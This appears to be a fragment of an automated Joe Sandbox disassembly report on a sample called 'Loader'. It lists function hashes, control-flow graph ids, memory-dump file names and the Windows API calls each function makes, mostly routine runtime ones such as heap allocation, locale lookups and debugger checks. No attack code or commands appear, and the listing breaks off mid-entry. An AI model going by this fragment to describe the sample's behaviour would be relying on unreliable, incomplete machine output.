                                                                                      • Opcode ID: e449033ec803dd6e4e567f6df4686e2b5cbdd21bf9c5066fbf6a8ed998481a1d
                                                                                      • Instruction ID: 6016d882a23d90d3968e3d7c6686cebef577b09d2a559672a922699446d5354d
                                                                                      • Opcode Fuzzy Hash: e449033ec803dd6e4e567f6df4686e2b5cbdd21bf9c5066fbf6a8ed998481a1d
                                                                                      • Instruction Fuzzy Hash: A5110832B546509BCB25AF25EC45AAE77A9EF417A0B10401BF8119B7A0EF34DD208B80

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 399 2c2291-2c229d 400 2c22cf-2c22da call 2bde94 399->400 401 2c229f-2c22a1 399->401 408 2c22dc-2c22de 400->408 403 2c22ba-2c22cb RtlAllocateHeap 401->403 404 2c22a3-2c22a4 401->404 405 2c22cd 403->405 406 2c22a6-2c22ad call 2bea6e 403->406 404->403 405->408 406->400 411 2c22af-2c22b8 call 2bc02b 406->411 411->400 411->403
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,002C4215,?,?,002C4215,00000220,?,?,?), ref: 002C22C3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 7d5b0e281ef31416c3edc7259537187b76d3af397bb5612722ba0abf101cec3b
                                                                                      • Instruction ID: 626da40c8a6debb051595c5d2c1daf85779d7140a7dd3e921a3dccf7ad0f5772
                                                                                      • Opcode Fuzzy Hash: 7d5b0e281ef31416c3edc7259537187b76d3af397bb5612722ba0abf101cec3b
                                                                                      • Instruction Fuzzy Hash: 07E06531171622D6FB317E759C04F9A3689AF52BF0F154229AC459A194DF70CC2485B2

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 414 2af650-2af666 call 2a82c0 417 2af66c 414->417 418 2af671 call 2b368d 414->418 419 2af676-2af698 call 2a82f0 417->419 418->419 424 2af69d-2af6a4 419->424
                                                                                      APIs
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 002AF671
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                      • String ID:
                                                                                      • API String ID: 118556049-0
                                                                                      • Opcode ID: 78d222f30fe4af7acba57dc17c0e0da55023640b143066ddb14888aca95ca0e1
                                                                                      • Instruction ID: 3ff2768487befb09890d2e766c5708edf4c73485a680383a97cb9e2887667576
                                                                                      • Opcode Fuzzy Hash: 78d222f30fe4af7acba57dc17c0e0da55023640b143066ddb14888aca95ca0e1
                                                                                      • Instruction Fuzzy Hash: 3BF0F874D10208DFCB44EFE8D6415BDB7B4AF49300F1041AAE856A7352DB35AE20CF61
                                                                                      APIs
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 002A8E41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                      • String ID:
                                                                                      • API String ID: 118556049-0
                                                                                      • Opcode ID: 9d45928fdd84c889956989c41f28de3d03830cd04eaa18f1e1dea83ba63d1314
                                                                                      • Instruction ID: 899ffc8cd623270b2679b7bfda0af7f16089426c6ef41aa1291ac335c415a61b
                                                                                      • Opcode Fuzzy Hash: 9d45928fdd84c889956989c41f28de3d03830cd04eaa18f1e1dea83ba63d1314
                                                                                      • Instruction Fuzzy Hash: 04F0F874D10209DFCB04EFA8D6854ADB7B4AF49310F1040A9E81AA7351DF31AE20CF51
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 002C762F
                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 002C766D
                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 002C7680
                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 002C76C8
                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 002C76E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                      • String ID: P.USA
                                                                                      • API String ID: 415426439-1155953425
                                                                                      • Opcode ID: c2bf2b69d15c301f4b5f3fe5f7e54ed4af9a5c184505a7c4a6d2c1ffe27fac9c
                                                                                      • Instruction ID: 1e4ae9939acd59a940f4c2a32a3a8162ad55602b8553b2fc879339d3d172f35b
                                                                                      • Opcode Fuzzy Hash: c2bf2b69d15c301f4b5f3fe5f7e54ed4af9a5c184505a7c4a6d2c1ffe27fac9c
                                                                                      • Instruction Fuzzy Hash: 88517471A2460A9BDB11DFA5CC85FBEB3B8BF08700F54466DE905D7190E7709924CF60
                                                                                      APIs
                                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,]v,,00000002,00000000,?,?,?,002C765D,?,00000000), ref: 002C7D40
                                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,]v,,00000002,00000000,?,?,?,002C765D,?,00000000), ref: 002C7D69
                                                                                      • GetACP.KERNEL32(?,?,002C765D,?,00000000), ref: 002C7D7E
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale
                                                                                      • String ID: ACP$OCP$]v,
                                                                                      • API String ID: 2299586839-95904570
                                                                                      • Opcode ID: 2d05074db226e74bf87e448518913a3b56a8cd310ec68aa4c9c022ed7bfc94d7
                                                                                      • Instruction ID: 904211894d4de61cdca3c8560af11194dc971622c4d18b1901ebc8ecd7eaab86
                                                                                      • Opcode Fuzzy Hash: 2d05074db226e74bf87e448518913a3b56a8cd310ec68aa4c9c022ed7bfc94d7
                                                                                      • Instruction Fuzzy Hash: D621C132628147A7EB348F25C900FA773A6EF54B50F56826CE80BDB114E772DE61CB90
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: __floor_pentium4
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 4168288129-2761157908
                                                                                      • Opcode ID: 1146ddccc81056c386e3743180333721cbf0372210cce86a1368e63db06309d4
                                                                                      • Instruction ID: d4fbc7f61326168e33c7227952b21edeb9ea02aff960c2bd8b8da7993427c712
                                                                                      • Opcode Fuzzy Hash: 1146ddccc81056c386e3743180333721cbf0372210cce86a1368e63db06309d4
                                                                                      • Instruction Fuzzy Hash: A6D24B71E282298FDF64CE28DD40BEAB7B5EB44344F1542EAD40DE7240E778AE958F41
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2acc4a95594b0cc3dae83bbb4bbb2394bfb15ac2bff7a19afe3f152f10eb15a3
                                                                                      • Instruction ID: ca70cbe2e87da77fe8fec5a81b5f9d53ff74a00a49ace3b5f0d6204c995dd3d8
                                                                                      • Opcode Fuzzy Hash: 2acc4a95594b0cc3dae83bbb4bbb2394bfb15ac2bff7a19afe3f152f10eb15a3
                                                                                      • Instruction Fuzzy Hash: 52023971E1021ADBDF14CFA9C9C0BAEFBB1FF48314F24826DD919A7241D771AA518B90
                                                                                      APIs
                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002C8379
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 0c588a92d3998a2d4c22dbb1bf9ff92aa0d111aa9923514db42ff5eb15df279a
                                                                                      • Instruction ID: 7f9f13ce67cf6ed000fff42ba758117e3ab856ddfd72259e348ca111c13a17cc
                                                                                      • Opcode Fuzzy Hash: 0c588a92d3998a2d4c22dbb1bf9ff92aa0d111aa9923514db42ff5eb15df279a
                                                                                      • Instruction Fuzzy Hash: F471E27185116A9FDF24EF248C8DFAEBBB8AB05300F1482DEE40997211EF304EA58F10
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 002B64AB
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 002B6577
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 002B6590
                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 002B659A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 254469556-0
                                                                                      • Opcode ID: 6729b761a8e75004d8e274034cd194d4f4bb5d2a5bf4da703f80a3c22ef2fd49
                                                                                      • Instruction ID: 6da017b0df496006466afd9b341bc69aa25255eef15b3613fe77c27fbcbc1697
                                                                                      • Opcode Fuzzy Hash: 6729b761a8e75004d8e274034cd194d4f4bb5d2a5bf4da703f80a3c22ef2fd49
                                                                                      • Instruction Fuzzy Hash: 0E31F7B5D412299BDF20DFA4D98D7CDBBB8EF08340F1041AAE40CAB250EB749A94CF45
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C7874
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C78BE
                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002C7984
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLocale$ErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 661929714-0
                                                                                      • Opcode ID: bf963f6f3eaa6471f42bf2ddb669a5e26209a59472d8b5c357e3962d11ccb562
                                                                                      • Instruction ID: 73b79af659a3c60c5d2543a8fd06b855e07735d0a02fa95bbbc707260ec8cf35
                                                                                      • Opcode Fuzzy Hash: bf963f6f3eaa6471f42bf2ddb669a5e26209a59472d8b5c357e3962d11ccb562
                                                                                      • Instruction Fuzzy Hash: 9D618E715642179BEB68DF24CC82FBAB7A8EF04310F10427EE905C6285EB74EA64CF50
                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 002BE6D8
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 002BE6E2
                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 002BE6EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                      • String ID:
                                                                                      • API String ID: 3906539128-0
                                                                                      • Opcode ID: ca991d0b833592ed9195571ad47fc371f2c7509218120ef238605cbebd2f0cc0
                                                                                      • Instruction ID: 3cac9d7c3914616986c5a80cb49c5056eaa306a48376077d491f8404e7e7468b
                                                                                      • Opcode Fuzzy Hash: ca991d0b833592ed9195571ad47fc371f2c7509218120ef238605cbebd2f0cc0
                                                                                      • Instruction Fuzzy Hash: D731D174951228ABCB21DF68D88D7CCBBB8BF08350F5041EAE80CA7251EB749F918F44
                                                                                      APIs
                                                                                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,002B5D6B,?,?,?,?,?,002AB43E), ref: 002B6ACC
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,83182907,?,?,002D2E8C,000000FF,?,002B6974,?,00000000,00000000,?,002B6998,?,?), ref: 002B6AD0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$FileSystem$Precise
                                                                                      • String ID:
                                                                                      • API String ID: 743729956-0
                                                                                      • Opcode ID: c897902301d24944a19b7fe565ecf8cd60be664bb1a7f2d182ac35796a3c6d14
                                                                                      • Instruction ID: 63eea18564c4ca3c5d23941f7bda989d88306b8f55afc69cd8c226abf3c464e7
                                                                                      • Opcode Fuzzy Hash: c897902301d24944a19b7fe565ecf8cd60be664bb1a7f2d182ac35796a3c6d14
                                                                                      • Instruction Fuzzy Hash: 48F06C36954658DFCB15CF54EC49B99B7A8F745F50F004127E812A7750DB746D10CB90
                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,002CB4D9,?,?,00000008,?,?,002D290E,00000000), ref: 002CB7AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID:
                                                                                      • API String ID: 3997070919-0
                                                                                      • Opcode ID: d09208e076c9c9a4058dea6b1824d350545bb215bb970e265c5442379b0f3f9e
                                                                                      • Instruction ID: 3148b29baf0cd536e47fb98b4a27a3a7e629f260d0573eb80c4c746e4a12c34d
                                                                                      • Opcode Fuzzy Hash: d09208e076c9c9a4058dea6b1824d350545bb215bb970e265c5442379b0f3f9e
                                                                                      • Instruction Fuzzy Hash: 12B139365206099FD71ACF28C48AB657BE0FF45365F25865CE899CF2A1C335D9A1CB40
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 002B611D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FeaturePresentProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 2325560087-0
                                                                                      • Opcode ID: a53d235638ea3b927d91621d440c63503a769c96cf0fa217b5a7404f7e50e2fd
                                                                                      • Instruction ID: 6bd346d91b3a94628fc51b662f9533ba6a18093dd7d380bf3455796ef1f34b1c
                                                                                      • Opcode Fuzzy Hash: a53d235638ea3b927d91621d440c63503a769c96cf0fa217b5a7404f7e50e2fd
                                                                                      • Instruction Fuzzy Hash: 88A16DB1A6164A8BDB18CF58ECCD6EDBBF2FB58364F14816AD415EB390C3389854CB50
                                                                                      APIs
                                                                                        • Part of subcall function 002C3594: HeapAlloc.KERNEL32(00000008,00000000,00000000,?,002C272F,00000001,00000364,00000003,000000FF,?,00000000,?,002BA1D5,00000000,?), ref: 002C35D5
                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002C8379
                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 002C846D
                                                                                      • FindClose.KERNEL32(00000000), ref: 002C84AC
                                                                                      • FindClose.KERNEL32(00000000), ref: 002C84DF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                      • String ID:
                                                                                      • API String ID: 2701053895-0
                                                                                      • Opcode ID: 3e76248430ce2b607a37fe69c2b8174564670f7f87080c5a1617935f1e1b0a2b
                                                                                      • Instruction ID: a1bdf970d05cd2e5a99ff5e8c38b3273d47a949fa9bdcaf4c776af78267088c9
                                                                                      • Opcode Fuzzy Hash: 3e76248430ce2b607a37fe69c2b8174564670f7f87080c5a1617935f1e1b0a2b
                                                                                      • Instruction Fuzzy Hash: CC515671910159AFDF24EF689C89FBEB7A9DF45314F14829EF80997201EE308D629F60
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
